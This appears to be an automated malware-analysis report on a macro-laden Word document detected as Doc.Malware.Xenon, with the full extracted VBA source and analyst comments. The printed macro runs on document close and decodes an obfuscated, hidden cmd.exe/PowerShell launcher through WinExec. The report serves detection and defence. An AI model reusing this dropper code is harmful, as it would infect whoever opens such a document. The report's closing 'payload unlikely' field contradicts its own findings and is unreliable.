Malware Insights
The file is an OOXML document containing VBA macros, as indicated by the 'OOXML_VBA' heuristic and the presence of 'macros.bas' and 'vbaProject_00.bin'. The VBA code includes a function 'rischio' that takes a string argument and calls 'orefice', and a subroutine 'flemma' that invokes 'rischio' (through Application.Run) with a string decoded from 'privato()'. Because 'orefice' hands that string to WinExec, the macro executes a command line assembled at run time, which is consistent with downloading and running a second-stage payload. The ClamAV detection supports the malicious assessment. The specific family is not identifiable from the provided evidence.
Heuristics 3
-
ClamAV: Doc.Malware.Xenon-10059125-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Malware.Xenon-10059125-0
-
VBA project inside OOXML — medium — OOXML_VBA: Document contains a VBA project — VBA macros present
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. The URLs listed below are the standard OOXML XML-namespace identifiers present in ordinary Word files and should not be treated as indicators on their own.
URL http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4931 bytes |
SHA-256: 53e5246eb7222a476fdd060ed72f4d24906eca2eaced55cce3d4baa937e26c34 |
|||
Preview script — first 1,000 lines of the extracted script
' Module header of the document code-behind ("ThisDocument") as recovered by
' olevba. VB_PredeclaredId = True and VB_Exposed = True are the usual values
' for a Word document module; the header itself is not suspicious — the
' behaviour is in the procedures that follow.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Every variable below is explicitly declared; the author kept the code
' compiling cleanly under this setting.
Option Explicit
' Win32 API import of WinExec (kernel32): runs a command line and returns a
' status code. Declared for both bitnesses (PtrSafe on 64-bit) so the macro
' works in 32- and 64-bit Office. The parameter names are filler; the second
' argument is WinExec's nCmdShow (window visibility) value. The only call
' site in this listing is orefice, which passes 0 for nCmdShow.
#If Win64 Then
Private Declare PtrSafe Function WinExec Lib "kernel32" (ByVal trachea As String, ByVal isolato As Long) As Long
#ElseIf Win32 Then
Private Declare Function WinExec Lib "kernel32" (ByVal trachea As String, ByVal isolato As Long) As Long
#End If
' Thin relay reached by name from flemma (Application.Run "rischio", ...).
' esaudire is the decoded (still reversed) command line; it is forwarded
' untouched to orefice, which performs the WinExec call. The function has
' no declared type and never assigns a result, so it returns Empty.
Public Function rischio(esaudire As String)
esaudire = Replace(esaudire, "", "")   ' replaces "" with "": a no-op, presumably filler
Call orefice(esaudire)
End Function
' Orchestrator, invoked by name from Document_Close. Decodes the embedded
' command line (privato) with key "DCED" via tricheco and hands the result to
' rischio -> orefice -> WinExec. Several statements are filler or opaque
' predicates that always take the same branch.
Public Sub flemma()
Dim erba As String
Dim fanale As String
erba = "DCED"                      ' decoding key: letters A-E, mapped to 0-4 by atavico
fanale = privato()                 ' encoded command line (fixed string, no runtime input)
Dim pitone As String
pitone = Trim("")                  ' unused
Dim nebulosa As Integer
nebulosa = Len("giove")            ' always 5
Dim merlo As String
merlo = tricheco(fanale, erba)     ' decoded command line, in reverse character order (see tricheco)
If nebulosa <> (0 + 1) Then        ' 5 <> 1: always true (opaque predicate)
Application.Run "rischio", merlo   ' late-bound call by procedure name; presumably to hide the call edge from static analysis
End If
End Sub
' Per-character decode step used by tricheco: returns urgenza - pepita - 1.
' urgenza is a character code (Asc), pepita the 0-4 key value from atavico;
' Int() on an integer expression is an identity here.
Public Function gallina(urgenza As Integer, pepita As Integer) As Integer
gallina = Int(urgenza - pepita - 1)
End Function
' Key-stretching helper: extends snellire to indagine characters by
' appending its own characters cyclically ("DCED" -> "DCEDDCED..."). If
' indagine <= Len(snellire) the loop body never runs and the key is returned
' unchanged. LenB(...)/2 equals Len(...) for VBA (UTF-16) strings.
Public Function buca(snellire As String, indagine As Integer) As String
Dim simulato As Integer
Dim pendice As String
pendice = snellire                 ' start with the original key
Dim botanico As Integer
botanico = 0                       ' 0-based index into the original key
For simulato = (LenB(snellire) / 2) To indagine - 1
If botanico = (LenB(snellire) / 2) Then
botanico = 0                       ' wrap around at the end of the key
End If
pendice = pendice & Mid(snellire, botanico + 1, 1)
botanico = botanico + 1
Next
buca = pendice
End Function
' Maps a key letter to its offset: "A"->0, "B"->1, ... "E"->4. The loop does
' not exit on a match (harmless, letters are unique). For any other input no
' assignment happens, so the untyped function returns Empty, which the
' Integer variable in tricheco receives as 0.
Public Function atavico(registro As String)
Dim consumo As String
Dim parcella As Integer
consumo = "ABCDE"                  ' key alphabet
Dim currentregistro As String
For parcella = 1 To 5
currentregistro = Mid(consumo, parcella, 1)
If currentregistro = RTrim(registro) Then
atavico = parcella - 1             ' 0-based position in "ABCDE"
End If
Next
End Function
' Trigger: Word raises Document_Close when the document is closed, so the
' payload runs on close rather than on open. The guard 2 = (1 + 1) is always
' true (opaque predicate); flemma is again called by name via Application.Run.
Private Sub Document_Close()
If 2 = (1 + 1) Then
Application.Run "flemma"
End If
End Sub
' Decoder used by flemma and orefice. sbuffare is the encoded text, pianta a
' key made of the letters A-E. Steps:
'   1. buca() stretches the key to Len(sbuffare) by cyclic repetition
'      (pianta is passed ByRef by default, so the caller's key variable is
'      overwritten with the stretched key);
'   2. for each position i: out = Chr(Asc(data[i]) - atavico(key[i]) - 1),
'      atavico mapping A..E to 0..4 and gallina doing the subtraction;
'   3. each decoded character is PREPENDED to elsa, so the result is the
'      decoded text in reverse order — orefice undoes this with StrReverse.
' LenB(...)/2 equals Len(...) for VBA strings; RTrim("") is a no-op.
Public Function tricheco(sbuffare As String, pianta As String) As String
Dim sonda As Integer
Dim truccato As Integer
Dim mordere As String
mordere = buca(pianta, Len(sbuffare))   ' key stretched to the data length
pianta = mordere
Dim venato                          ' no type: Variant loop counter
Dim elsa As String
elsa = ""                           ' accumulator for the (reversed) output
Dim trachea As String
Dim insonnia As String
For venato = 1 To (LenB(sbuffare) / 2)
insonnia = Mid(pianta, venato, 1)   ' key letter at this position
sonda = atavico(insonnia)           ' 0-4 (Empty -> 0 for non A-E letters)
trachea = Mid(sbuffare, venato, 1)  ' encoded character
truccato = Asc(trachea)
Dim slogatura As Integer
slogatura = gallina(truccato, sonda)   ' Asc(c) - key - 1
elsa = Chr(slogatura) + elsa + RTrim("")   ' prepend -> reversed output
Next
tricheco = elsa
End Function
' Executes the decoded command. vivanda arrives REVERSED (see tricheco).
' esaudire = tricheco("gpi3izg", "DCEEDBBD") hand-decodes to "exe.dmc", i.e.
' "cmd.exe" once reversed — confirm by re-running the decoder. StrReverse of
' vivanda + " " + esaudire therefore yields "cmd.exe <decoded privato()
' text>", which WinExec runs with nCmdShow = Len("") = 0 (SW_HIDE, no
' visible window). The return value (monastero) is never inspected.
' The Len(ActiveDocument.Content.Text) <> 2 guard is true for practically
' any document (a blank Word document's Content.Text is typically a single
' paragraph mark), so it reads as an opaque predicate rather than a real
' environment check — TODO confirm.
' Detection angle: WINWORD.EXE spawning cmd.exe at document-close time.
Public Function orefice(vivanda As String)
Dim esaudire As String
esaudire = tricheco("gpi3izg", "DCEEDBBD")   ' reversed launcher name (see above)
Dim monastero As Integer
If Len(ActiveDocument.Content.Text) <> 2 Then
monastero = WinExec(StrReverse(vivanda + " " + esaudire), Len(""))   ' hidden window; result ignored
End If
End Function
' Returns the encoded command-line arguments: fixed 20-character chunks
' concatenated into one constant string (no runtime input). flemma decodes it
' with tricheco and key "DCED"; orefice prefixes the result with "cmd.exe".
' Hand-decoding the first two chunks with that key gives
' "/c powershell -nop -Exec Bypass -Command ..." — a PowerShell launcher.
' The remaining chunks (likely the download/execute logic and its URL) are
' not decoded here; confirm in a sandbox before treating any value as an IoC.
' Detection angle: cmd.exe -> powershell.exe with -nop / -Exec Bypass
' descending from WINWORD.EXE.
Public Function privato()
Dim caduco As String
caduco = "3f%tszjvwkjpp#2rss%1"
caduco = caduco + "I{jg$E~tevx$1Ftqqdsh"
caduco = caduco + "$+Si{0Tfnhhx$V~wxhr2"
caduco = caduco + "Rhy2[hgGpljrx,3Hszsp"
caduco = caduco + "sdiJmoj,+kyxt=43hrf{"
caduco = caduco + "rgf~~} {2ftq3onpy2}g"
caduco = caduco + "|f3fen,0$'jrz=FTTGFX"
caduco = caduco + "E#0$+_X^WL3i|h,-?#Xx"
caduco = caduco + "euy1Tutgivx$(hsz>DUT"
caduco = caduco + "HDYE+_X^WL3i|h,?,Qj{"
caduco = caduco + "1Rgnify$W|xxip3Riw3["
caduco = caduco + "ieHpmhsx-1Is{qqsegXx"
caduco = caduco + "vlsk,*mxxs?33gte{qie"
caduco = caduco + "~} ~{1hsq2x2tkuCmgB|"
caduco = caduco + "g{h+->"
privato = caduco
End Function
' Remaining modules of the project (Module1, Module2, UserForm1, UserForm2,
' Class1). In this extraction they carry only their Attribute headers and no
' procedures, so all behaviour lives in ThisDocument above. The VB_Base
' GUIDs look like the ordinary form/class base identifiers Office writes —
' presumably empty decoy modules; confirm against the raw vbaProject.bin.
Attribute VB_Name = "Module1"
Attribute VB_Name = "Module2"
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{C811796E-C44D-420B-8914-A6429A7BC0CA}{D8BEC7BE-3F1E-4782-8AB0-B30430AD8A6A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{E53F80C3-7E4C-4BEE-9847-9D5D6F5162C8}{2EBD0471-B40B-44CC-9643-4B7F00223577}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 27648 bytes |
SHA-256: c3b26e3bc9b9da1d576fcb25e1575756b92d88713247387e12aa522b9d9febaf |
|||
|
Detection
ClamAV:
Doc.Malware.Xenon-10059125-0
Obfuscation or payload:
unlikely
|
|||